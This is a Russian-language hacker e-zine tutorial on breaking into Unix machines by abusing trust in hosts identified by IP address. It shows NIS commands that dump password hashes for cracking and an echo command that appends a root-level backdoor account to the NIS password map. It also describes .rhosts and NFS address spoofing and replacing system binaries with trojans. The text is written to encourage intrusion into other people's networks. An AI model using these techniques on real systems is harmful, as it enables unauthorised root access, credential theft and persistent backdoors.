[+]-----------------------------------------------[+]
| Доверенный Захват |
| |
| Проникновение в машину |
| использования доверенных хостов |
| |
| Автор: _1nf3ct0r_ |
| (dr.pascal@mail.ru) |
| _ _ _ _ _ __ _ _ _ |
| | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ |
| | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< |
| |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ |
| |___/ |
| |
[+]-----------------------------------------------[+]


[Вступление]

В этой статье я хотел бы рассмотреть
некоторые эффективные методы проникновения в машину путем использования доверенных хостов. Если это для тебя, что-то
новое, то читай дальше, а для кого
нет - может смело удалиться :). На сколько тебе известно, огромное количество
машин в сети под управление *nix-like систем используют "доверенные" хосты для аутентификации. То есть аутентификация
 происходит по IP-адресу. Для этого даже
не нужен никакой пароль. Может быть, это и удобно, но крайне не безопасно.
Например, если ты смог узнать IP-адреса доверенных хостов, то у тебя есть масса способов проникнуть в нужную систему
 с помощью них. Да не мычи ты "Как я узнаю
IP-адреса доверенных хостов :(" - только подумай логически. Например, так
получилось, что на машине торчит веб-сервер Apache, а в бедном PHP-скрипте присутствует древняя как мир бага - нуль
 байт баг. Ты можешь прочитать
соответствующие файлы, в которых прописаны эти довереные хосты. Но пассов, ты, к
сожалению найти не можешь. Что делать? Ответ на этот вопрос ты найдешь в этой статье. Доставай свои VPN'ы, прокси,
соксы и дуй на ненавистную
локалку!

[NIS и NIS+ серверы]

На самом деле по IP-адресу можно узнать много интересного и это я тебе сейчас докажу. Для начала скажу, что IP
доверенных хостов должны быть уже у тебя на руках, иначе ложись спать ;). Так вот... по IP можно взять и пробить имена
пользователей, что можно использовать
для банального (банального?) брутфорса, различную интересную информацию и даже
хэшированные пароли! Часто серверы LDAP, NIS+, NIS используют метод аутентификации по IP-адресам для локалки. Надо
знать дрменное имя сервера,
например, NIS для вышеописанных действий:


1nf3ct0r# domainname
v1ct1m-0wn3d.org
1nf3ct0r# ypbind
1nf3ct0r# ypcat hosts
123.456.78.1
xhAck
123.456.78.2 M3lc1y
123.456.78.3 Goh'Dan
1nf3ct0r# ypcat
passwd.byname
stealth:[ХЭШ-ПАРОЛЬ]:0:0:root:/home/stealth:/bin/bash
polimorph:[ХЭШ-ПАРОЛЬ]:1001:100:virus:/home/polimoph:/bin/bash

Пароли
как на ладони. Остается их расшифровать каким-нибудь John-The-Ripper'ом и дело в
шляпе. Можно также добавить свои учетные записи в passwd.byname:
1nf3ct0r#
ypcat passwd.byname > путь/к/passwd.byname
1nf3ct0r# echo
1nf3ct0r:[ХЭШ-ПАРОЛЬ]:0:0:hacker:/:/bin/bash >>
путь/к/passwd.byname
1nf3ct0r# ypserv


Кстати, давай разберем
запись 1nf3ct0r:[ХЭШ-ПАРОЛЬ]:0:0::/:/bin/bash >> путь/к/passwd.byname,
возможно, у тебя отшибло память и т.д:
1nf3ct0r - логин
[ХЭШ ПАРОЛЬ] -
хэшированный пароль в алгоритме DES. Может быть опущен - тогда пароля не
будет...
0 - идентификатор пользователя (id), который определяет права
доступа к файлам и т.д
0 - иднетификатор группы пользователей (gid)
hacker
- комменатрий. Обычно хранится "второе имя" пользователя. может быть
оупщено.
/ - домашняя дириктория пользователя.
/bin/bash - командный
интерпретатор, используемый пользователем. По выбору. Сейчас установлен bash.
Можно установить любой, например, sh

Кстати, такой метод проходит и
на других серверах - просто немного пошевели мозгами ;)...


[TCP
Wrappers в помощь!]

такие сетевые протоколы как FTP, telnet, rlogin и
RSH используют фильтрации по адресу отправителя, используемые TCP Wrappers и различными фильтрами пакетов.
Это может поможет тебе выдать себя за пользователя
"доверенной" системы и выше указанные TCP Wrappers
(hosts.allow и hosts.deny) и
филтры пакетов разрешают прохождение пакетов. Подменить адрес доверенного хоста
можно в .rhosts. Это, кстати, можно использовать в качесве бэкдора, но об этом в другой раз :)

[Вторжение через NFS]

Этот метод будет проходить при использовании NFS (Network File System) - службы, которая занимается
разделениеи файлов через файловую систему. Рабоая с сетевой файловой системой все действия с файлами на
локалхосте передаются через сеть на удаленную машину.
Так вот... Эта система довольно часто использует метод
аутентификации по
IP-адресам. Достаточно только подменить свой IP-адрес. Проникнув в систему можно
скопировать файлы паролей, подменить системные бианринки какими-нибудь троянами и т.д. Это к размышлению %)

[Стандарт, ИмХо]

Самый, наверное,
обычный метод. Тебе просто надо взломать доверенный хост а потом коннектиться к атакуемой серва машине
(как ты это будешь делать - не суть важно. Главное -
результат). Удивительно, что когда я сталкивался с
ситуацией проникновения с
помощью доверенных хостов, я всегда использовал его, а об остальных забывал напрочь...

[Заключение]

Я поделился некоторыми своими знаниями по поводу проникновения с помощью доверенных хостов. Возможно, это не самый
полный гид, но я надеюсь, что писал я его не зря - он тебе чем-то помог или просто дал пищу для рызмышления.
В конце концов развивай свое мышление - может к
тебе придут какие-то идеи по поводу использования вышеуказанных
уязвимостей/"примочек". Бывай! ;)

(c) Hell Knights Crew
Автор: _1nf3ct0r_